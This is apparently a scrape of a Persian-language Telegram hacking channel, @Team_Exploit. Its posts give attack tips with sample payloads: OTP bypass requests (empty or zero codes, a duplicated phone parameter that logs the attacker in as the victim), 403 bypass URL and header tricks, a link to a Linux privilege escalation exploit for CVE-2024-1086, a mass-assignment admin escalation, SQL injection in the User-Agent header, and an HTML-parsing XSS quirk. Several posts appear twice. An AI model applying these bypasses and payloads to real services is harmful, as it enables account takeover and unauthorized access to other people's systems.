نات کویین و کص کویین فلان کویین فقط یه بازیه که باهاش تعداد ادم های بیکار جهانو در بیارن
حالا هی با کله بکوب تو گوشیت!
حالا هی با کله بکوب تو گوشیت!
Hide-info.py
3.6 KB
یه تیکه کد برای اینکه بتونید اطلاعاتی که میخواید مخفی بمونه رو داخل عکس یا موزیک مخفی کنید! یکم قدیمیه و من اینو ۲ سال پیش نوشته بودم، گفتم بزارم شاید بدردتون بخوره
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
🔖تکنیک های بای پس OTP
1️⃣. دستکاری کد وضعیت اگر کد وضعیت 4xx باشد سعی کنید آن را به 200 OK تغییر دهید و ببینید آیا محدودیت ها را دور می زند
2️⃣. سعی کنید در قسمت OTP Empty OTP یا Set NULL ارسال کنید که otp=null برای دور زدن است
5️⃣. اگر درخواست در JSON است از آرایه پر از OTPهای تأیید ایمیل استفاده کنید تا از بین آنها فقط یک OTP معتبر باشد.
6️⃣. درخواست otp در هر دو دستگاه مهاجم و قربانی را به طور همزمان امتحان کنید، این می تواند توسط نفوذگر آروغ زدن انجام شود اگر OTP یکسان است، پس یک دور زدن otp آسان است.
7️⃣. بازسازی بی نهایت OTP اگر بتوانید یک OTP جدید را بی نهایت بار تولید کنید، OTP به اندازه کافی ساده است (4 عدد)، و می توانید تا 4 یا 5 توکن در هر OTP تولید شده را امتحان کنید، فقط می توانید هر بار همان 4 یا 5 توکن را امتحان کنید و OTP تولید کنید تا زمانی که با آنهایی که استفاده می کنید مطابقت دارد.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
1️⃣. دستکاری کد وضعیت اگر کد وضعیت 4xx باشد سعی کنید آن را به 200 OK تغییر دهید و ببینید آیا محدودیت ها را دور می زند
2️⃣. سعی کنید در قسمت OTP Empty OTP یا Set NULL ارسال کنید که otp=null برای دور زدن است
POST /secondLogin HTTP/1.13️⃣. سعی کنید صفر را در پارامتر OTP که 000000 است وارد کنید تا OTP را دور بزنید.
Host: company.com
Content-Type: application/json
Content-Length: Number
{"email":"me","pass":"**","otp":""}
POST /secondLogin HTTP/1.14️⃣. اگر درخواست در JSON باشد درخواست OTP
Host: company.com
Origin: company.com
Content-Length: Number
{"email":"me","pass":"**","otp":"000000"}
{"phone_no":"victim_no"، "phone_no":"attacker_no"}مهاجم OTP-Login را با شماره مهاجم دریافت خواهد کرد
{"phone_no":"viktima_no", "phone_no":"attacker_no"،"otp":"1234"}و ما به عنوان VICTIM وارد سیستم می شویم
5️⃣. اگر درخواست در JSON است از آرایه پر از OTPهای تأیید ایمیل استفاده کنید تا از بین آنها فقط یک OTP معتبر باشد.
6️⃣. درخواست otp در هر دو دستگاه مهاجم و قربانی را به طور همزمان امتحان کنید، این می تواند توسط نفوذگر آروغ زدن انجام شود اگر OTP یکسان است، پس یک دور زدن otp آسان است.
7️⃣. بازسازی بی نهایت OTP اگر بتوانید یک OTP جدید را بی نهایت بار تولید کنید، OTP به اندازه کافی ساده است (4 عدد)، و می توانید تا 4 یا 5 توکن در هر OTP تولید شده را امتحان کنید، فقط می توانید هر بار همان 4 یا 5 توکن را امتحان کنید و OTP تولید کنید تا زمانی که با آنهایی که استفاده می کنید مطابقت دارد.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
هشدار بهره برداری: CVE-2024-1086 (تشدید امتیاز محلی) 🚨
در میان هرج و مرج بکدور xz، این اکسپلویت مخفیانه ظاهر شد!
🔥 روی هسته های لینوکس 5.14 تا 6.6 کار می کند.
CVE: https://github.com/Notselwyn/CVE-2024-1086
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
در میان هرج و مرج بکدور xz، این اکسپلویت مخفیانه ظاهر شد!
🔥 روی هسته های لینوکس 5.14 تا 6.6 کار می کند.
CVE: https://github.com/Notselwyn/CVE-2024-1086
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
بای پس 403 (Forbidden)
1. با استفاده از هدر "X-Original-URL"
2. اضافه کردن %2e بعد از اولین اسلش
https://github.com/daffainfo/bypass-403
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
1. با استفاده از هدر "X-Original-URL"
GET /admin HTTP/1.1مثال
Host: target.com
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
2. اضافه کردن %2e بعد از اولین اسلش
target.com/admin => 403مثال
target.com/%2e/admin => 2003. نقطه (.) اسلش (/) و نقطه ویرگول (;) را در URL اضافه کنید
target.com/admin => 403مثال
target.com/secret/. => 200بعد از نام دایرکتوری "..;/" را اضافه کنید
target.com//secret// => 200
target.com/./secret/.. => 200
target.com/;/secret => 200
target.com/.;/secret => 200
target.com//;//secret => 200
target.com/adminمثال
target.com/admin..;/5. سعی کنید حروف الفبا را در آدرس اینترنتی بزرگ بنویسید
target.com/adminمثال
target.com/aDmIN6. از طریق Web Cache Poisoning
GET /anything HTTP/1.1ابزاری برای این کار ها:
Host: victim.com
X-Original-URL: /admin
https://github.com/daffainfo/bypass-403
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
آیا می دانید که اسلش های رو به جلو ("/") درون تگ های html به طور خودکار توسط مرورگرها به فاصله ("") تبدیل می شوند؟
به عنوان مثال:
<a/b='c'/d='e'/f='g'>X</a>به طور خودکار به تبدیل خواهد شد به:
<a b='c' d='e' f='g'>X</a>┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
موقع فاز کردن یه سایت وردپرسی "/_wpeprivate/config.json" را به لیست فازینگ خود اضافه کنید.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
یک روز دیگر، #SQLInjection دیگر. این بار، در هدر User-Agent قرار دارد که منجر به کنترل کامل پایگاه داده می شود. به آزمایش SQLi روی همه چیز و همه جا ادامه دهید...(Time Based)
#Tips
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
#Tips
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Team Exploit
یه سم پیدا کردم
من فقط یک ویژگی اضافی
"is-site-admin":true
اضافه کردم، و یکی از مدیران سایت شدم:/
#Tips
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
"is-site-admin":true
اضافه کردم، و یکی از مدیران سایت شدم:/
#Tips
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit